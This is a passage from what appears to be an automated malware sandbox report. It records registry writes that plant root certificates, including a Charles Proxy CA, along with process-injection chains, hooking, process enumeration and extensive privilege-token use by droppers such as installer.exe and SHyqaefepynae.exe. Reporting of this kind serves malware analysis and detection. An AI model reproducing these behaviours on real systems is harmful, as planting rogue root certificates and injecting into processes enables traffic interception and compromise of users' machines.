4080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	SHyqaefepynae.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	19EE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	19EE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Oy3L2GjKns.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
6284	PING.EXE
5508	PING.EXE
5092	PING.EXE
5784	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1580	ultramediaburner.tmp
1580	ultramediaburner.tmp
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2988	Process not Found

Suspicious behavior: MapViewOfSection 42 IoCs

pid	Process
4196	MicrosoftEdgeCP.exe
4196	MicrosoftEdgeCP.exe
5072	toolspab1.exe
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
5300	Fessura.exe.com
5772	Mutato.exe.com
5772	Mutato.exe.com
5772	Mutato.exe.com
6524	jwtwjbt
6084	explorer.exe
6084	explorer.exe
6084	explorer.exe
6084	explorer.exe
2776	explorer.exe
2776	explorer.exe
2776	explorer.exe
2776	explorer.exe
2432	explorer.exe
2432	explorer.exe
2432	explorer.exe
2432	explorer.exe
4496	MicrosoftEdgeCP.exe
4496	MicrosoftEdgeCP.exe
1576	jwtwjbt
3800	jwtwjbt

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	Ultra.exe
Token: SeDebugPrivilege	1656	SHyqaefepynae.exe
Token: SeDebugPrivilege	4052	Lulevugodu.exe
Token: SeDebugPrivilege	4256	Conhost.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeSecurityPrivilege	4188	msiexec.exe
Token: SeCreateTokenPrivilege	4644	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4644	installer.exe
Token: SeLockMemoryPrivilege	4644	installer.exe
Token: SeIncreaseQuotaPrivilege	4644	installer.exe
Token: SeMachineAccountPrivilege	4644	installer.exe
Token: SeTcbPrivilege	4644	installer.exe
Token: SeSecurityPrivilege	4644	installer.exe
Token: SeTakeOwnershipPrivilege	4644	installer.exe
Token: SeLoadDriverPrivilege	4644	installer.exe
Token: SeSystemProfilePrivilege	4644	installer.exe
Token: SeSystemtimePrivilege	4644	installer.exe
Token: SeProfSingleProcessPrivilege	4644	installer.exe
Token: SeIncBasePriorityPrivilege	4644	installer.exe
Token: SeCreatePagefilePrivilege	4644	installer.exe
Token: SeCreatePermanentPrivilege	4644	installer.exe
Token: SeBackupPrivilege	4644	installer.exe
Token: SeRestorePrivilege	4644	installer.exe
Token: SeShutdownPrivilege	4644	installer.exe
Token: SeDebugPrivilege	4644	installer.exe
Token: SeAuditPrivilege	4644	installer.exe
Token: SeSystemEnvironmentPrivilege	4644	installer.exe
Token: SeChangeNotifyPrivilege	4644	installer.exe
Token: SeRemoteShutdownPrivilege	4644	installer.exe
Token: SeUndockPrivilege	4644	installer.exe
Token: SeSyncAgentPrivilege	4644	installer.exe
Token: SeEnableDelegationPrivilege	4644	installer.exe
Token: SeManageVolumePrivilege	4644	installer.exe
Token: SeImpersonatePrivilege	4644	installer.exe
Token: SeCreateGlobalPrivilege	4644	installer.exe
Token: SeCreateTokenPrivilege	4644	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4644	installer.exe
Token: SeLockMemoryPrivilege	4644	installer.exe
Token: SeIncreaseQuotaPrivilege	4644	installer.exe
Token: SeMachineAccountPrivilege	4644	installer.exe
Token: SeTcbPrivilege	4644	installer.exe
Token: SeSecurityPrivilege	4644	installer.exe
Token: SeTakeOwnershipPrivilege	4644	installer.exe
Token: SeLoadDriverPrivilege	4644	installer.exe
Token: SeSystemProfilePrivilege	4644	installer.exe
Token: SeSystemtimePrivilege	4644	installer.exe
Token: SeProfSingleProcessPrivilege	4644	installer.exe
Token: SeIncBasePriorityPrivilege	4644	installer.exe
Token: SeCreatePagefilePrivilege	4644	installer.exe
Token: SeCreatePermanentPrivilege	4644	installer.exe
Token: SeBackupPrivilege	4644	installer.exe
Token: SeRestorePrivilege	4644	installer.exe
Token: SeShutdownPrivilege	4644	installer.exe
Token: SeDebugPrivilege	4644	installer.exe
Token: SeAuditPrivilege	4644	installer.exe
Token: SeSystemEnvironmentPrivilege	4644	installer.exe
Token: SeChangeNotifyPrivilege	4644	installer.exe
Token: SeRemoteShutdownPrivilege	4644	installer.exe
Token: SeUndockPrivilege	4644	installer.exe
Token: SeSyncAgentPrivilege	4644	installer.exe
Token: SeEnableDelegationPrivilege	4644	installer.exe

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
1580	ultramediaburner.tmp
4644	installer.exe
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found
2988	Process not Found

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
4136	MicrosoftEdge.exe
4196	MicrosoftEdgeCP.exe
2196	google-game.exe
2196	google-game.exe
4196	MicrosoftEdgeCP.exe
4220	C41.exe
4040	MicrosoftEdge.exe
4496	MicrosoftEdgeCP.exe
4496	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2988	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 568 wrote to memory of 2800	568	Install.exe	75
PID 568 wrote to memory of 2800	568	Install.exe	75
PID 568 wrote to memory of 2800	568	Install.exe	75
PID 2800 wrote to memory of 2432	2800	Install.tmp	76
PID 2800 wrote to memory of 2432	2800	Install.tmp	76
PID 2432 wrote to memory of 2100	2432	Ultra.exe	80
PID 2432 wrote to memory of 2100	2432	Ultra.exe	80
PID 2432 wrote to memory of 2100	2432	Ultra.exe	80
PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	81
PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	81
PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	81
PID 2432 wrote to memory of 4052	2432	Ultra.exe	82
PID 2432 wrote to memory of 4052	2432	Ultra.exe	82
PID 2432 wrote to memory of 1656	2432	Ultra.exe	83
PID 2432 wrote to memory of 1656	2432	Ultra.exe	83
PID 1580 wrote to memory of 1552	1580	ultramediaburner.tmp	84
PID 1580 wrote to memory of 1552	1580	ultramediaburner.tmp	84
PID 1656 wrote to memory of 3792	1656	SHyqaefepynae.exe	87
PID 1656 wrote to memory of 3792	1656	SHyqaefepynae.exe	87
PID 1656 wrote to memory of 4204	1656	SHyqaefepynae.exe	90
PID 1656 wrote to memory of 4204	1656	SHyqaefepynae.exe	90
PID 3792 wrote to memory of 4256	3792	cmd.exe	120
PID 3792 wrote to memory of 4256	3792	cmd.exe	120
PID 1656 wrote to memory of 4404	1656	SHyqaefepynae.exe	94
PID 1656 wrote to memory of 4404	1656	SHyqaefepynae.exe	94
PID 1656 wrote to memory of 4456	1656	SHyqaefepynae.exe	96
PID 1656 wrote to memory of 4456	1656	SHyqaefepynae.exe	96
PID 4204 wrote to memory of 4496	4204	cmd.exe	98
PID 4204 wrote to memory of 4496	4204	cmd.exe	98
PID 4204 wrote to memory of 4496	4204	cmd.exe	98
PID 4404 wrote to memory of 4600	4404	cmd.exe	110
PID 4404 wrote to memory of 4600	4404	cmd.exe	110
PID 4404 wrote to memory of 4600	4404	cmd.exe	110
PID 4456 wrote to memory of 4644	4456	cmd.exe	100
PID 4456 wrote to memory of 4644	4456	cmd.exe	100
PID 4456 wrote to memory of 4644	4456	cmd.exe	100
PID 1656 wrote to memory of 4920	1656	SHyqaefepynae.exe	101
PID 1656 wrote to memory of 4920	1656	SHyqaefepynae.exe	101
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4600 wrote to memory of 5048	4600	Conhost.exe	103
PID 4920 wrote to memory of 5096	4920	cmd.exe	104
PID 4920 wrote to memory of 5096	4920	cmd.exe	104
PID 4920 wrote to memory of 5096	4920	cmd.exe	104
PID 5096 wrote to memory of 4184	5096	gpooe.exe	105
PID 5096 wrote to memory of 4184	5096	gpooe.exe	105
PID 5096 wrote to memory of 4184	5096	gpooe.exe	105
PID 1656 wrote to memory of 4756	1656	SHyqaefepynae.exe	109
PID 1656 wrote to memory of 4756	1656	SHyqaefepynae.exe	109
PID 4188 wrote to memory of 5012	4188	msiexec.exe	112
PID 4188 wrote to memory of 5012	4188	msiexec.exe	112
PID 4188 wrote to memory of 5012	4188	msiexec.exe	112
PID 4756 wrote to memory of 2196	4756	cmd.exe	113
PID 4756 wrote to memory of 2196	4756	cmd.exe	113
PID 4756 wrote to memory of 2196	4756	cmd.exe	113
PID 2196 wrote to memory of 2432	2196	google-game.exe	114
PID 2196 wrote to memory of 2432	2196	google-game.exe	114
PID 2196 wrote to memory of 2432	2196	google-game.exe	114

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2512

c:\windows\system32\svchost.exe
